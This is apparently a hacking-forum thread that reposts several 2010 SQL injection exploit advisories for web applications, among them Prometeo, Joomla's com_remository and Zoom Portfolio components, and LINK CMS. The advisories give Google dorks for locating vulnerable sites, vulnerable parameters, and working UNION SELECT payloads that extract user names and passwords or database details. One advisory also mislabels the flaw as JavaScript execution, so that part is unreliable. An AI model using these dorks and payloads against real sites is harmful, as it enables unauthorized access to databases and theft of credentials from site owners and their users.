PrInCe Of PeRsIa
New Member
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
thanxxx so much mohammad
keep ur job like this
keep ur job like this
**** ** ******** ********** /**/** /** **////// /////**/// /**//** /** /** /** /** //** /** /********* /** /** //**/** ////////** /** /** //**** /** /** /** //*** ******** /** // /// //////// //
=================================
Prometeo (vers. 1.0.65) -SQLi Vulnerability- =================================
-Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)
-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.
-Google Dork: inurl:categoria.php?ID= comune
-Example:
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
# Netw0rkSecurity.net [2010-08-26]
Comments############################## ALGERIAN HAX0RZ #############################..
# Exploit Title: [title]
# Date: 24/08/2010
# Author: TopSat13
# Software Link: http://remository.com/downloads/
# Version: 1
# Tested on: [win sp3 os]
# CVE : [if exists]
####
# oooo[ Software Information ]oooo
# Author: TopSat13
#
# Email: TopSat13@live.fr
#
# Vendor : http://remository.com/
#
# title : Joomla Component (com_remository) SQL Injection Vulnerability
#
# Dork :"inurl:index.php?option=com_remository"
#
#### oooo[ vuln & exploit & Demo ]oooo
#
# vuln: site.com/index.php?option=com_remository&Itemid=[sql]
# or
# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]
#
# exploit:
#
# 0nligne demo :
http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'
#
#
#### oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo
#
# to : ALLAH , All my freands , all musulmens hackerz
#
############################## ALGERIAN H4X0RZ
################################..---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios@gmail.com
Date : 23 August 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Zoom Portfolio --Joomla Portfolio Component
version : 1.5
Price : $20.00
Developer : EGBZOOM
License : GPLv2 or later type : Commercial
Date Added : 21 August 2010
Download : http://www.egbzoom.com/joomla-portfolio-component.html
Description :
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort.The Component has features like add category
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more.It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
-------------------------
How to exploit
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
-------------------------
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: hacker@sr.gov.yu
# Software Link:
http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.pentesting-rs.org
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################
===[ Exploit ]===
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
===[ Example ]===
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
===[ Solution ]===
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-)))